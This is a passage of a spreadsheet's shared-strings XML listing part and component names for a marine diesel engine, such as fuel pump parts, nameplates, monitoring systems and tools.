    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>BUSH FOR CAMSHAFT BEARING</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>GEARWHEEL, CRANKSHAFT</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Friction coupling, part</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>BEARING, DRIVE SHAFT</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>GEARWHEEL, DRIVE SHAFT</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Hydr.pump accumulator block</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>LUB. OIL PIPE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Mounting of H.O. Pumps</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>LOW PRESS. HYDR. OIL PIPE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Control Oil for Pumps</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Support for HPS</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Support for HPS (welding)</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Support for HPS (machining)</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Proportional Press. Relief Valve</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>HUB FOR BRAKE DISC</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>BRAKE DISC</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>NUT, SLIDE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>SPRING STOP</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>CONNECTING PIPE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>SHRINK RING</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>FLEXIBLE SHAFT</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>CHAIN TIGHTENER WHEEL</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Bushing on chain wheel</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>FLANGE BEARING</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>SHAFT F. CHAIN WHEEL</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>SIGHT GLASS</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>DATA PLATE FOR SPRING</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>SUPPL.FOR CHAIN TIGHTENER</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>BEAM FOR GUIDEBAR</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>BRACKET FOR GUIDEWAY</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Shim, guidebar</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>GEAR BOX</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>SHAFT FOR IDLERS</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>CHAIN TIGHTENER ECCENTRIC</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>WEIGHT</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>ADJUSTING PIECE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>PIN GAUGE,LUB.DRIVE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>BEARING STUD</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>ROLLER CHAIN</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Axial bearing disc</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Joint link</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>MOUNT. OF DOUBLE GEARWHEEL</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>CONTROL DRIVE, COMPL.</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Arm</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>BLANK-EXHAUST CAM</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>CAM - HALF</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>FUEL CAM,split or cover</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Hub for fuel cam split</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>TEMPLATE-INLET CAM</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>PARTS FOR PROTOTYPE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>EL.DIAGRAM-LUB.OIL-TC</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>BRACKET REMOTE THERMOM.</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>SUPPORT, LEAD-IN PLATE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>OIL MIST DETECTOR</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>HOLES FOR THERMOFEELERS</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>FEELER</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Splash oil case</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>PMI SYSTEM USERS MANUAL</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>CAPA PERFORMANCE SYSTEM</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>PMI SCOPE OF SUPPLY</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>SUPPORT, PICK-UP BOX</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>BRACKET, SENSOR</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>SUPPORT, SENSOR</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>TRIGGER RING</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>BRACKET WITH SHAFT</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>DETAIL DRWG-PRESS.GAUGE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>COCOS-MPS</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>COCOS-SPC</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>COCOS-SPO</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>COCOS SYSTEM</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>TEST VALVE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>HIGH TENSION PART</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>SPARK PLUG</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>MOUNT. OF PT 100 SENSOR</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>KEYBOARD</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>CABLE TIE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>MOUNT. OF MONITORING BOX</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>BUS BAR</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>COVERING</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>DATA LOGGER PANEL</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Compensation box</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>CRANKCASE MONITORING BOX</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Exhaust temperature measuring</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Impulse transmitter</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Bearing Monitoring Mechanical</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>INDICATOR LAMP</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>THERMOSTATE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>WIRE, SINGLE CORE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>MOTOR OPERATED POTENTIOM.</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>ELECTRONIC PARTS</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>PROTECTIVE HOSE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>SELECTOR SWITCH</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>TIMER</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>CIRCUIT BREAKER</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>ARR. OF OIL MIST DETECTOR</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>PARTS FOR TERMINAL STRIP</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>NEOPRENBUSH</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>R/I TRANSMITTER</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>LEVEL CONTROL</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>TRANSFORMER</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>PROTECTING WELL</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>REMOTE CONTROL BOX</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>BY-PASS REG. CHARGE AIR</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>PIPE FOR T+P CABLES</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>PLATE F. MOUNT. OF T+P</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>INDICATING INSTRUMENT</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>ARR. OF THERMOSTATE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>PICK-UP</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>ACTIVATOR PIECE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>CABLE WAY</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>LOAD CONTROL BOX</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>MOUNTING BEARING</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>HEATER ELEMENT</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>T+P PANEL</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>BOOSTER</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>EL.DIAGRAM-LOAD CONTROL</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>FUEL PUMP HOUSING</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Gasket for top cover</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Shim, pump barrel</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Suction valve housing</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>ADJUSTING SPINDLE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>SCALE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>TOOTHED BAR HEAD</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>GEAR RIM</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>DISTANCE PIECE, FUEL PUMP</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>HOUSING-NON-RETURN VALVE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>FUEL PUMP HOUSING, BLANK</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>PISTON-SHOCK ABSORBER</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>FLANGE-SHOCK ABSORBER</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>HOUSING-SHOCK ABSORBER</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>WORM</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>CONNECTION BLOCK INFI</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>SUSPENSION, AIR CYLINDER</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>FORKED LEVER</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Stud, lifting tool</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>TIMING GUIDE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>ACCUMULATOR PISTON</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>HOLDER-HOUS.-SAFETY VALVE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>FUEL OUTLET FLANGE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>FLANGE FOR ACTUATOR</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>BUSHING SLOTTED</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>HOUSING PUNCTURE VALVE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>HOUSING-SUCTION VALVE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>SPINDLE-SUCTION VALVE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>CUT-OFF VALVE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>TOOL FOR BUSHING</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>SPRING, PRESSURE VALVE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Piston spring plate</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Control edges, plunger</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Fuel inject. pump w. drive</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>MOUNT.TOOLS F.SCRAPERRING</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>DRIFT-PUNCTURE VALVE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>DISM.TOOL-PUNCT.V. BELLOW</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>GRIND.MANDR-CONTR.V.SEAT</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>GRIND.MANDREL, SUCT.VALVE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>SPANNER-LIFT,ROLLER GUIDE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>TOOLS-MOUNT.SEALS-FUEL P.</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>CONE, FOR SEALING RING</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>COMPRESSION TOOL, SEALS</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>SPACER RING,TOOL SEALINGS</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>SEALS TOOL, THRUST PIECE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Pinion drive</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>CLOSING SCREW</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>MONOBLOCKCYLINDER</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Fuel load blocking device</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Thrust plate</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Reuglating rod</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Flow limiter</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Kit for fuel pump</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>PLUNGER-BARREL</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>AIR DRIVEN HYDRAULIC PUMP</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>FOOT PIECE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>HEX.SOCKET HEAD CAP SCREW</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>THROTTLE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>CONSTANT PRESSURE VALVE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>CHECK VALVE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>RACK</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>PACKING-FELT</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>RELAYS WITH ACCESSORIES</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>NAMEPLATE STAND-BY</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>NAMEPLATE REG. HANDLE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>NAMEPLATE EMERG.RUNNING</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>NAMEPLATE CONTROL AIR</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>NAMEPLATE L.OIL-CAMSHA.</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>NAMEPLATE L.OIL-M.ENG.</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>NAMEPLATE C.OIL-PISTON</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>NAMEPLATE STARTING AIR</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>NAMEPLATES COMPONENTS</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>NAMEPLATE L.OIL-TURBO</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>NAMEPLATE MEASUR.SWITCH</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>NAMEPLATE REVERS.SYST.</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>DATA PLATE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>NAMEPLATE S.P.VALV.OPEN</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>NAMEPLATE S.P.VA.CLOSED</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>NAMEPLATE PUMP 1 OR 2</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>NAMEPLATE EMERG.BATTERY</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>NAMEPLATE WRONG WAY ALARM</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>NAMEPLATE AUX.BLOWER</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>NAMEPLATE HYDR.H.-CLEAR</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>HANDGRIP</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Description,ME Simulator</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Description, ME-B Simulator</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Simulator accessories</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>INSTRUCTION PLATE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>INSTRUCTION PLATE DANISH</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>INSTRUCTION PLATE ENGLISH</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>INSTRUCTION PLATE FRENCH</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>INSTRUCTION PLATE SPANISH</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>INSTRUCTION PL.PORTUGUESE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>INSTRUCTION PLATE RUSSIAN</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>INSTRUCTION PLATE POLISH</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>INSTRUCTION PLATE ITALIAN</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>INSTRUCTION PLATE GERMAN</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>PLATE FOR PUMP</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>PLATE FOR FLANGE PLATE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>MOUNTING OF ACTUATOR</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>FLOWMATE ACTUA.W.MAGNET V</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>BALL VALVE WITH ACTUATOR</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>HFO SUPPLY PUMP</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>HFO CIRCULATION PUMP</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>MDO BOOSTER PUMP</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>PUMP UNIT</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>PUMP</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>DOSAGE PUMP</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>IFO BOOSTER PUMP</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>BED FRAME</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>UNI-FUEL CONTROL PANEL</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>MDO EMERGENCY PUMP</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>MIMICDIAGRAM</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>VISCOSITY CONTROL UNIT</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>HFO BOOSTER PUMP</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>TELEGRAPH SPECIFICATION</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>BED</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>EL-DIAGRAM</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>PREHEATER</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>1" 3-WAY VALVE V1-V2</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>FLOW METER</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Major Kit</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Minor Kit</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>El-motor</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>GASKETS FOR 3-WAY VALVE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>FUEL OIL PIPE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>VENTING VALVE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>VENTILATOR</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>REGULATING SHAFT</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>PRIMARY F.O.PUMP HOUSING</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>FLANGE F.PRIMARY F.O.PUMP</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>TOOTHED COUPLING</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>FUEL OIL PUMP</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>OIL SEAL RING</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>ARR. OF PREPUMP/COVER</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Fuel oil pre pump, cw</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Fuel oil pre pump, ccw</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>BEARING-CAST</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>SPLIT COUPLING</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>SPRING LEVER</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>CYL.DOWEL</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>MOVABLE LEVER</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>CLAMPING ARM</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>PULL ROD TUBE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>FORK HEAD</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>PULL ROD HEADS</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>BYPASS SYST.INSTALL.GUIDE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>BYPASS SYSTEM, USER GUIDE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>BYPASS SYSTEM, PANEL</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>BYPASS SYSTEM, SOFTWARE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>CYLINDER CONTROL UNIT</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Scavenging air control system</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>PMI, Equipment</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>PLUG (SCUFFING SENSOR)</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>VMON SYSTEM</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>SPRING ARM</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>MAGNET VALVE REMOTE START</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>SPEED CONTROL SYSTEM</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
